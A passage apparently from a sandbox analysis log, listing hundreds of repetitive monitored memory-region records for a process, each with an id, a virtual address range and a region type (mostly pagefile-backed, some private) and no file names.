"pagefile_0x0000000000530000" filename = "" Region: id = 14209 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14210 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14211 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14212 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14213 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14214 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14215 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14216 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14217 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14218 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14219 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14220 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14221 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14222 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14223 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14224 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14225 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14226 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14227 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14228 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14229 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14230 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14231 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14232 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14233 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14234 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14235 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14236 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14237 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14238 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14239 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14240 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14241 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14242 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14243 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14244 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14245 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14246 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 14247 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 14248 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14249 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14250 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14251 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14252 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14253 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14254 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14255 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14256 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14257 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14258 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14259 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14260 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14261 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14262 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14263 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14264 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14265 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14266 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14267 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14268 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14269 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14270 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14271 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14272 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14273 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14274 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14275 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14276 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14277 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14278 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14279 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 14280 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 14281 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14282 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14283 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14284 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14285 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14286 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14287 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14288 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14289 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14290 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14291 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14292 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14293 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14294 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14295 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14296 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14297 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14298 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14299 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14300 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14301 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14302 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14303 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14304 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14305 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14306 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14307 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14308 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14309 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14310 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14311 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14312 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14313 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14314 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14315 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14316 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14317 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14318 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14319 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14320 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14321 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14322 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14323 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14324 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14325 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14326 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14327 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14328 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14329 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14330 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14331 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14332 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14333 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14334 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14335 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14336 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 14337 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 14338 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14339 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14340 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14341 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14342 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14343 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14344 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14345 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14346 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14347 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14348 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14349 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14350 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14351 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14352 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14353 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14354 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14355 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14356 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14357 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14358 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14359 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14360 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 14361 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 14362 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14363 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14364 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14365 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 14366 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 14367 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14368 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14369 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14370 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14371 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14372 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14373 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14374 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14375 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14376 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14377 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14378 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14379 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14380 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14381 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14382 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14383 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14384 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14385 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14386 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14387 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14388 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14389 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14390 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14391 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14392 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14393 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14394 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14395 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14396 start_va = 0x530000 end_va = 0x53dfff monitored 